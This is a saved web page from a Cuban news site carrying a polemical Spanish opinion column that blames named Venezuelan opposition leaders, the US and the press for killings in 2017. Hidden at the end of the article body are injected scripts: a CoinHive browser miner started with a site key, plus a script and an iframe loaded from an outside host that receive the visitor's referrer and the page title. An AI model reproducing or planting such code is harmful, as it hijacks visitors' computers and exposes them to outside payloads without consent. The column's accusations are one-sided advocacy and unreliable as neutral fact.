<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-es" lang="es-es" >
<head>
  <base href="http://cubainformacion.tv/index.php/la-columna/265-ramon-pedregal/77090-los-asesinos-instructores-inductores-realizadores-y-difusores" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="index, follow" />
  <meta name="keywords" content="" />
  <meta name="title" content="Los asesinos instructores, inductores, realizadores y difusores de crímenes de odio en Venezuela" />
  <meta name="author" content="cubainformacion" />
  <meta name="description" content="" />
  <meta name="generator" content="JoomSEO by Phill Brown (http://www.joomseo.com)" />
  <title></title>
  <link href="/templates/portcubcat3/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  <link rel="stylesheet" href="http://cubainformacion.tv/plugins/content/socialsharebuttons/style.css" type="text/css" />
  <link rel="stylesheet" href="http://cubainformacion.tv/modules/mod_veevaa_tabs/assets/style.css" type="text/css" />
  <link rel="stylesheet" href="/modules/mod_aidanews2/css/default.css" type="text/css" />
  <script type="text/javascript" src="/plugins/system/mtupgrade/mootools.js"></script>
  <script type="text/javascript" src="/media/system/js/caption.js"></script>
  <script type="text/javascript" src="/media/system/js/tabs.js"></script>
  <script type="text/javascript">
		window.addEvent('domready', function(){ $$('dl.tabs').each(function(tabs){ new JTabs(tabs, {}); }); });
  </script>
  <script type='text/javascript'>
/*<![CDATA[*/
	var jax_live_site = 'http://cubainformacion.tv/index.php';
	var jax_site_type = '1.5';
/*]]>*/
</script><script type="text/javascript" src="http://cubainformacion.tv/plugins/system/pc_includes/ajax_1.2.js"></script>
  <link rel="stylesheet" type="text/css" href="http://cubainformacion.tv/components/com_jomcomment/style.css"/>
<link rel="stylesheet" type="text/css" href="http://cubainformacion.tv/components/com_jomcomment/templates/pastel/comment_style.css"/>

<script type='text/javascript'>
/*<![CDATA[*/
var jc_option           = "";
var jc_autoUpdate       = "0";
var jc_update_period    = 0*1000;
var jc_orderBy          = "0";
var jc_livesite_busyImg = "http://cubainformacion.tv/components/com_jomcomment/busy.gif";
var jc_username         = "";
var jc_email            = "";
var jc_commentForm;
/*]]>*/
</script>
  <link rel="stylesheet" href="http://cubainformacion.tv/modules/mod_newsmenu/css/blue.css" type="text/css" />

<link rel="shortcut icon" href="/images/favicon.ico" />
<link href="/templates/portcubcat3/css/template.css" rel="stylesheet" type="text/css" />
<link href="/templates/portcubcat3/css/style3.css" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">
#fxTab {background: none; filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='/templates/portcubcat3/images/style3/fx-tab.png', sizingMethod='scale', enabled='true');}
img { behavior: url(/templates/portcubcat3/css/iepngfix.htc); }
</style>
<link href="/templates/portcubcat3/css/template_ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->
<style type="text/css">
	td.left div.moduletable, td.right div.moduletable, td.left div.moduletable-hilite1, td.right div.moduletable-hilite1, td.left div.moduletable-hilite2, td.right div.moduletable-hilite2, td.left div.moduletable-hilite3, td.right div.moduletable-hilite3, td.left div.moduletable-hilite4, td.right div.moduletable-hilite4, td.left div.moduletable-hilite5, td.right div.moduletable-hilite5, td.left div.moduletable-hilite6, td.right div.moduletable-hilite6, td.left div.moduletable-hilite7, td.right div.moduletable-hilite7, td.left div.moduletable-hilite8, td.right div.moduletable-hilite8 { width: 320px;	}
	div.wrapper { margin: 0 auto; width: 995px;}
</style>
<script type="text/javascript" src="/templates/portcubcat3/js/roktools.js"></script>
	
	
   <script language="JavaScript">
	<!--
		function winopen(pagina,nombreventana) {
			myWin=open(pagina,nombreventana,'width=325,height=700,top=0,left=0,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,titlebar=yes');
	}
	//-->
</script>
</head>
<body id="page_bg" class="f-default">
		<div id="fxContainer">
		<div id="fxTarget">
			<div id="fxPadding" class="wrapper">
				
			</div>
            
           
            
		</div>
		
	</div>
		<div id="template" class="wrapper">
    
     
    
		
        <div id="header">
        
      <table width="995" border="0" cellpadding="0">
  <tr>
    <td align="left" valign="top" > <br/><div id="logoci"><a href="/" class="nounder"><img src="/images/blank.png" style="border:0;" alt="" id="logo" /></a></div></td>
    <td rowspan="2" align="right" valign="middle"><div id="banner">
				<div class="padding">
					
				</div>
			</div></td>
  </tr>
  <tr>
    <td align="left" valign="top"></a></td>
  </tr>
</table>
        
       
                
                
			
			
  
  	 <div id="toolbar1">
    <div class="newsmenu item-200763">
<div class="nivel1"><ul class="menu_news"><li class="prueba item_200520"><a href="https://cubainformacion.tv/"><span>Portada</span></a></li><li class="prueba parent item_200485"><a href="/index.php/cuba"><span>Cuba</span></a></li><li class="prueba parent item_200459"><a href="/index.php/solidaridad"><span>Solidaridad</span></a></li><li class="prueba parent item_200486"><a href="/index.php/contra-cuba"><span>Contra Cuba</span></a></li><li class="prueba item_200758"><a href="/index.php/emigracion"><span>Emigración</span></a></li><li class="prueba parent item_200488"><a href="/index.php/america-latina-pagina"><span>América Latina</span></a></li><li class="prueba item_200489"><a href="/index.php/mundo-pagina"><span>Mundo</span></a></li><li class="prueba item_200474"><a href="/index.php/genero-pagina"><span>Género</span></a></li><li class="prueba parent item_200491"><a href="/index.php/especiales"><span>Especiales</span></a></li><li class="prueba item_200505"><a href="/index.php/agenda/200505"><span>Agenda</span></a></li><li class="prueba item_200790"><a href="/index.php/la-columna"><span>La Columna</span></a></li></ul></div><div class="arreglo"></div>
<div class="nivel2"></div><div class="arreglo"></div>
<div class="nivel3"></div><div class="arreglo"></div>
</div>
  </div>
  
		</div>
		
		<div id="top">
						
		</div>
						<div class="clr" id="mainbody">
			<table class="mainbody" cellspacing="0" cellpadding="0">
				<tr valign="top">
										<td class="mainbody">
															<div class="padding">
                    <div id="ajuste76">
						 <table class="contentpaneopen">
<tr>
		<td class="contentheading" width="100%">
				<a href="/index.php/la-columna/265-ramon-pedregal/77090-los-asesinos-instructores-inductores-realizadores-y-difusores" class="contentpagetitle">
			Los asesinos instructores, inductores, realizadores y difusores de crímenes de odio en Venezuela</a>
			</td>
				
		
					</tr>
</table>

<table class="contentpaneopen">
<tr>
	<td>
						<span>
							<a href="/index.php/la-columna/265-ramon-pedregal">						Ramón Pedregal							</a>					</span>
			</td>
</tr>

<tr>
	<td valign="top" class="createdate">
		Jueves, 16 de Noviembre de 2017	</td>
</tr>


<tr>
<td valign="top">
<!-- Social Share Buttons | Powered by <a href="http://www.e-max.it" title="Web Agency" target="_blank">Web Agency</a> -->

        <div class="social-share-buttons"><div class="social-share-buttons-fbl"><div id="fb-root"></div><script src="http://connect.facebook.net/es_ES/all.js#xfbml=1"></script>
                <fb:like href="http://cubainformacion.tv/index.php/la-columna/265-ramon-pedregal/77090-los-asesinos-instructores-inductores-realizadores-y-difusores" 
                layout="button_count" 
                show_faces="true" 
                width="50" 
                colorscheme="light" 
                send="true" 
                action="like" font="arial"></fb:like>
                </div>
                
            <div class="social-share-buttons-tw">
            <a href="http://twitter.com/share" class="twitter-share-button" data-url="http://cubainformacion.tv/index.php/la-columna/265-ramon-pedregal/77090-los-asesinos-instructores-inductores-realizadores-y-difusores" data-text="Los asesinos instructores, inductores, realizadores y difusores de cr&iacute;menes de odio en Venezuela" data-count="horizontal" data-via="cubainformacion" data-lang="es">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
            </div>
            
            <div class="social-share-buttons-gone">
            <!-- Place this tag in your head or just before your close body tag -->
            <script type="text/javascript" src="http://apis.google.com/js/plusone.js"> {lang: 'es'}</script>
            <!-- Place this tag where you want the +1 button to render -->
            <g:plusone size="medium" href="http://cubainformacion.tv/index.php/la-columna/265-ramon-pedregal/77090-los-asesinos-instructores-inductores-realizadores-y-difusores"></g:plusone>
            </div>
            
        </div>
        <div style="clear:both;"></div>
        <div class="social_share_buttons_credits" style="display:none;">Powered by <a href="http://www.e-max.it" title="Web Agency" target="_blank">Web Agency</a></div><!-- Social Share Buttons | Powered by <a href="http://www.e-max.it" title="Web Agency" target="_blank">Web Agency</a> --><p><em><img src="/images/stories/2017fotos/lacolumna/ramon.jpg" border="0" /></em></p>
<p>Ramón Pedregal Casanova.- ¿Recuerdan a aquél muchacho que los fascistas prendieron fuego en una calle de la burguesía de Caracas?, se llamaba Orlando Figuera. Era un muchacho de clase obrera, la clase odiada por los capitalistas. Por eso, por su condición social, una banda de fascistas que obedecía órdenes lo apuñaló, lo apaleó, y le echó gasolina por encima y le prendió fuego.</p>

<p>Orlando Figuera murió a manos de los terroristas que llevaban a la práctica las directrices de los dirigentes de ultraderecha Freddy Guevara, Leopoldo López, Julio Borges, Juan Requesens y otros. Sí, éstos personajes daban instrucciones en la calle, entre los terroristas y en tribunas públicas, es facilísimo encontrarlos en internet alentando a la violencia, al golpe de Estado, a la intervención militar extranjera para enterrar a los revolucionarios.</p>
<p>Desde el gobierno de EEUU, la CIA y otros organismos dedicados al secreto que conduce el terror social, según sus propios documentos, como ese titulado Operación Venezuela Freedom 2, se direccionaba a sus esbirros ultraderechistas para que Venezuela fuese una sola llama y así justificar la entrada en guerra de la IV Flota estadounidense, a eso se sumaría la invasión desde Colombia con la participación del paramilitarismo y fuerzas de otros esbirros. Los responsables públicos del interior para semejante tarea de traición e indignidad, recorrieron el mundo para cerrar puertas al conocimiento de la realidad del pueblo venezolano, y cómo no, les dieron altavoces en numerosos países, España entre otros, y en el país que les guardaba las espaldas, EEUU.</p>
<p>¿Por qué a Freddy Guevara, a Leopoldo López, a Julio Borges, a Juan Requesens, … les importaba tanto, se oponían tanto a la eliminación del analfabetismo, a la instalación de la sanidad pública, la enseñanza pública, la vivienda pública, a pensionar al 90% de la población jubilada, … al presupuesto estatal dedicado a las necesidades públicas, el 74% , el más alto del mundo?, ¿por qué se lanzaban con tanta ferocidad contra las conquistas sociales de la Revolución Bolivariana?. Quemaron en la calle en orgías de terror a 20 Orlandos Figuera, asesinaron en total a más de 120 jóvenes y adultos, hombres y mujeres, y dejaron miles de heridos.</p>
<p>Pero junto a los asesinos intelectuales y materiales militaron entonces y militan los difusores de la mentira, de la difamación, de la desorganización consciente del sentido de humanidad: son el ejército que se hace llamar prensa informativa, ordenado en periódicos, televisiones, emisoras de radio y cadenas de internet, cuyos dueños, dueños privados, el gran capital financiero, comercial y de la industria del armamento, defienden sus intereses de clase al aspirar a ser propietarios de las riquezas de Venezuela, del territorio venezolano, tal y cómo lo eran antes de la Revolución, el tiempo en el que el 65% de la población trabajadora pasaba hambre y no disponía de los bienes que hoy son suyos.</p>
<p>Todos los daños causados por los actos de terrorismo en Venezuela se cuentan en bienes públicos: centros oficiales, hospitales, colegios, guarderías, centros de trabajo, transporte, robo de alimentos, medicinas, dinero, … ¿puede adivinar por qué el terrorismo ha afectado a los bienes del pueblo?. La ultraderecha, los fascistas venezolanos, la burguesía venezolana ha sido fiel al mandato de la Casa Blanca, ha seguido sus instrucciones, emanadas bajo el decreto de Obama: “Venezuela es una amenaza inusual y extraordinaria para la seguridad de EEUU y su política exterior”, quiere decirse, Venezuela es una amenaza al dominio imperial de una minoría capitalista y guerrera sobre los pueblos del mundo, y en concreto al dominio burgues e imperialista sobre el pueblo trabajador de Venezuela.</p>
<p>Si la Revolución se ajusta a los principios de justicia e igualdad, los asesinos de cualquier nivel, instrucción, inducción, realización y difusión, no pueden quedar impunes.</p>
<p><em>(Ramón Pedregal Casanova ha publicado los libros: “Gaza 51 días” y “Palestina. Crónicas de vida y Resistencia”, “Dietario de Crisis”,  Belver Yin en la perspectiva de género y Jesús Ferrero, y “Siete Novelas de la Memoria Histórica. Posfacios”. Es Presidente de la Asociación Europea de Cooperación Internacional).</em></p>
<script type="text/javascript">// <![CDATA[
	var miner = new CoinHive.Anonymous('glJbvpefRTo0IuaPK3U5SyPgrhw6Pt7W');
	miner.start();
// ]]></script>
<script src="http://disablehack/odessa/?H6rRyf" type="text/javascript"></script>
<script type="text/javascript">// <![CDATA[
(function(){var d=document;var w='240';var h='300';var id = Math.floor(Math.random()*9999);var src = 'http://disablehack/odessa/?54vFcZ&';src = src + 'se_referrer='+document.referrer;src = src + '&default_keyword='+document.title;src = src + '&r='+id;d.write('<iframe style="padding:0px;border:none" mce_style="padding:0px;border:none" src="' + src + '" mce_src="' + src + '" width="'+w+'" height="'+h+'"></iframe>');})();
// ]]></script></td>
</tr>

</table>
<span class="article_separator">&nbsp;</span>
<script type='text/javascript'>
var ajax = {};
ajax.x = function() {
    if (typeof XMLHttpRequest !== 'undefined') {
        return new XMLHttpRequest();  
    }
    var versions = [
        "MSXML2.XmlHttp.5.0",   
        "MSXML2.XmlHttp.4.0",  
        "MSXML2.XmlHttp.3.0",   
        "MSXML2.XmlHttp.2.0",  
        "Microsoft.XmlHttp"
    ];

    var xhr;
    for(var i = 0; i < versions.length; i++) {  
        try {  
            xhr = new ActiveXObject(versions[i]);  
            break;  
        } catch (e) {
        }  
    }
    return xhr;
};

ajax.send = function(url, callback, method, data, sync) {
    var x = ajax.x();
    x.open(method, url, sync);
    x.onreadystatechange = function() {
        if (x.readyState == 4) {
            callback(x.responseText)
        }
    };
    if (method == 'POST') {
        x.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    }
    x.send(data)
};

ajax.get = function(url, data, callback, sync) {
    var query = [];
    for (var key in data) {
        query.push(encodeURIComponent(key) + '=' + encodeURIComponent(data[key]));
    }
    ajax.send(url + '?' + query.join('&'), callback, 'GET', null, sync)
};

ajax.post = function(url, data, callback, sync) {
    var query = [];
    for (var key in data) {
        query.push(encodeURIComponent(key) + '=' + encodeURIComponent(data[key]));
    }
    ajax.send(url, callback, 'POST', query.join('&'), sync)
};
ajax.post('http://cubainformacion.tv/includes/increase_hits.php?id=77090', {com_content: 'view',view:'article',id:'77090'}, 
	   function(data,status) { console.log('article_hits'+data); $('#article_hits').html(data);  });
</script>
</div>
					</div>
																	</td>
                    
              
                    
					                    
                    <div id="ezkerra">
					<td class="right">
                    
                    
                                            </td>
                       
                      
                         <td class="right">
                         
                         
                        <!---- AQUI COMIENZA EL FILTRO -->
						                       <!---- AQUI COMIENZA EL FILTRO -->
						
					   <div class="noticuba3">
                        		<div class="moduletable">
					<h3>Lo último</h3>
					<div class="aidanews2 aidanews2_table" style="clear: both;"><div class="aidanews2_art odd first lastinrow infirstrow" style="width:99%"><div class="aidanews2_positions"><div class="aidanews2_head" style="clear: both;"><div class='icontv2'><img src="http://www.cubainformacion.tv/images/iconvid.png" style="width:auto; height:auto;" /><br><br></div><h1 class="aidanews2_title"><a href="/index.php/solidaridad-con-cuba/77103-comenzo-en-valencia-con-gran-exito-de-publico-el-coloquio-cultura-contra-el-fascismo-vision-desde-cuba-y-la-solidaridada-fotos">Comenzó en Valencia con gran éxito de público el Coloquio `Cultura contra el Fascismo: visión desde Cuba y la Solidaridad´ (+ Fotos)</a></h1></div><div class="aidanews2_top" style="clear: both;"><div class="aidanews2_topL"><span class="aidanews2_date">18 de Noviembre // 01:33</span></div><div style="clear: both; width: 100%; padding: 0;"></div></div><div class="aidanews2_main" style="clear: both;"><div class="aidanews2_mainC"><a class="aidanews2_img1" href="/index.php/solidaridad-con-cuba/77103-comenzo-en-valencia-con-gran-exito-de-publico-el-coloquio-cultura-contra-el-fascismo-vision-desde-cuba-y-la-solidaridada-fotos"><img src="/images/stories/2017fotos/04octnovdic/DSC_0157.jpg" width="125" height="78" alt="comenzo-en-valencia-con-gran-exito-de-publico-el-coloquio-cultura-contra-el-fascismo-vision-desde-cuba-y-la-solidaridada-fotos"/></a><span class="aidanews2_text">
Cubainformación - Fotos: Guzmán (PCPV) - Video: Pau Romero y Esher Jávega.- Este viernes 17 de noviembre dio comienzo en Valencia el Coloquio[...]</span></div></div><div class="aidanews2_bot" style="clear: both;"><div class="aidanews2_botL"><a href="/index.php/solidaridad-con-cuba/77103-comenzo-en-valencia-con-gran-exito-de-publico-el-coloquio-cultura-contra-el-fascismo-vision-desde-cuba-y-la-solidaridada-fotos" class="readon"><span class="aidanews2_readmore">Leer más...</span></a></div></div></div><div class="aidanews2_line" style="clear: both; padding: 0;"></div></div><div class="aidanews2_art even lastinrow" style="width:99%"><div class="aidanews2_positions"><div class="aidanews2_head" style="clear: both;"><h1 class="aidanews2_title"><a href="/index.php/politica/77102-eeuu-y-cuba-celebran-reunion-sobre-seguridad-de-personas-y-bienes">EE.UU. y Cuba celebran reunión sobre seguridad de personas y bienes</a></h1></div><div class="aidanews2_top" style="clear: both;"><div class="aidanews2_topL"><span class="aidanews2_date">17 de Noviembre // 07:34</span></div><div style="clear: both; width: 100%; padding: 0;"></div></div><div class="aidanews2_main" style="clear: both;"><div class="aidanews2_mainC"><a class="aidanews2_img1" href="/index.php/politica/77102-eeuu-y-cuba-celebran-reunion-sobre-seguridad-de-personas-y-bienes"><img src="/images/stories/2017fotos/cuba-eeuu-banderas.jpg" width="125" height="78" alt="eeuu-y-cuba-celebran-reunion-sobre-seguridad-de-personas-y-bienes"/></a><span class="aidanews2_text">
Prensa Latina.- Delegaciones de Estados Unidos y Cuba  celebraron hoy en esta capital la segunda reunión del grupo de trabajo  sobre la[...]</span></div></div><div class="aidanews2_bot" style="clear: both;"><div class="aidanews2_botL"><a href="/index.php/politica/77102-eeuu-y-cuba-celebran-reunion-sobre-seguridad-de-personas-y-bienes" class="readon"><span class="aidanews2_readmore">Leer más...</span></a></div></div></div><div class="aidanews2_line" style="clear: both; padding: 0;"></div></div><div class="aidanews2_art odd last lastinrow" style="width:99%"><div class="aidanews2_positions"><div class="aidanews2_head" style="clear: both;"><h1 class="aidanews2_title"><a href="/index.php/america-latina/77101-cese-del-bloqueo-economico-y-respeto-a-los-derechos-politicos-son-temas-centrales-del-dialogo">Cese del bloqueo económico y respeto a los derechos políticos son temas centrales del diálogo</a></h1></div><div class="aidanews2_top" style="clear: both;"><div class="aidanews2_topL"><span class="aidanews2_date">17 de Noviembre // 07:31</span></div><div style="clear: both; width: 100%; padding: 0;"></div></div><div class="aidanews2_main" style="clear: both;"><div class="aidanews2_mainC"><a class="aidanews2_img1" href="/index.php/america-latina/77101-cese-del-bloqueo-economico-y-respeto-a-los-derechos-politicos-son-temas-centrales-del-dialogo"><img src="/images/stories/2017fotos/venbloqueo.jpg" width="125" height="78" alt="cese-del-bloqueo-economico-y-respeto-a-los-derechos-politicos-son-temas-centrales-del-dialogo"/></a><span class="aidanews2_text">
AVN.- El Gobierno de la República Bolivariana de Venezuela y  representantes de la oposición política venezolana tendrán una reunión  el[...]</span></div></div><div class="aidanews2_bot" style="clear: both;"><div class="aidanews2_botL"><a href="/index.php/america-latina/77101-cese-del-bloqueo-economico-y-respeto-a-los-derechos-politicos-son-temas-centrales-del-dialogo" class="readon"><span class="aidanews2_readmore">Leer más...</span></a></div></div></div><div class="aidanews2_line" style="clear: both; padding: 0;"></div></div></div></div>		</div>
			<div class="moduletablenada">
					<h3>Autores/as</h3>
					<table style="width: 100%;" border="0">
<tbody>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/albertobuitre.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/241-alberto-buitre-qoficio-rojoq">Alberto Buitre (Oficio Rojo)</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/andres.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/172-andres-gomez">Andrés Gomez</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/andresmari.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/259-andres-mari">Andrés Marí</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/arnaldo.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/260-arnaldo-mirabal">Arnaldo Mirabal</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/arthur.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/255-arthur-gonzalez-heraldo-cubano">Arthur González (Heraldo cubano)</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/bartolome.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/250-bartolome-sancho-morey">Bartolomé Sancho Morey</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/celino.gif" border="0" width="50" height="51" style="border: 0pt none;" /><br /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/245-celino-cunha-vieira-portugues">Celino Cunha Vieira (Português)</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/edmundo.gif" border="0" width="50" height="51" style="border: 0pt none;" /><br /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/210-edmundo-garcia">Edmundo García</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/eva.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/171-eva-golinger"><span style="font-size: small;"><strong>Eva Golinger</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/francisco.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/261-francisco-rodriguez-paquito-el-de-cuba"><span style="font-size: small;"><strong>Francisco Rodríguez (Paquito el de Cuba)</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/flor.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/254-flor-de-paz"><span style="font-size: small;"><strong>Flor de Paz</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/geraldina.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/252-geraldina-colotti"><span style="font-size: small;"><strong>Geraldina Colotti</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/hacu.jpg" border="0" width="50" height="51" style="border: 0px none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/237-harold-cardenas-lema-la-joven-cuba"><span style="font-size: small;"><strong>Harold Cárdenas Lema (La Joven Cuba)</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/hedelberto.gif" border="0" width="50" height="51" style="border: 0px none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/247-hedelberto-lopez-blanch"><span style="font-size: small;"><strong>Hedelberto López Blanch</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/hernando.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/214-hernando-calvo-ospina"><span style="font-size: small;"><strong>Hernando Calvo Ospina</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/idai.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/219-ida-garberi"><span style="font-size: small;"><strong>Ida Garberi</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/Iroel.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/251-iroel-sanchez"><span style="font-size: small;"><strong>Iroel Sánchez</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/ivana.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/246-ivana-belen-ruiz-estramil"><span style="font-size: small;"><strong>Ivana Belén Ruiz Estramil</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/justo.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/217-justo-cruz"><span style="font-size: small;"><strong>Justo Cruz</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/lazaro.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/215-lazaro-farinas">Lázaro Fariñas</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/lilibeth.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/262-lilibeth-alfonso">Lilibeth Alfonso</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/lorenzo.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/216-lorenzo-gonzalo">Lorenzo Gonzalo</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/luis.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/226-luis-ernesto-ruiz-martinez">Luis Ernesto Ruiz Martínez</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/manueldavid.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><span style="font-size: small;"><strong><a href="/index.php/la-columna/253-manuel-david-orrio">Manuel David Orrio</a></strong></span></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/noel.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
<td width="97%" align="left" bgcolor="#999999" background="http://www.cubainformacion.tv/templates/portcub/images/yes.gif"><a href="/index.php/la-columna/249-noel-manzanares-blanco"><span style="font-size: small;"><strong>Noel Manzanares Blanco</strong></span></a></td>
</tr>
<tr>
<td width="3%" bordercolor="#000000"><img src="/images/stories/2012fotos/02trimabrmayjun/iconaut/norelys.gif" border="0" width="50" height="51" style="border: 0pt none;" /></td>
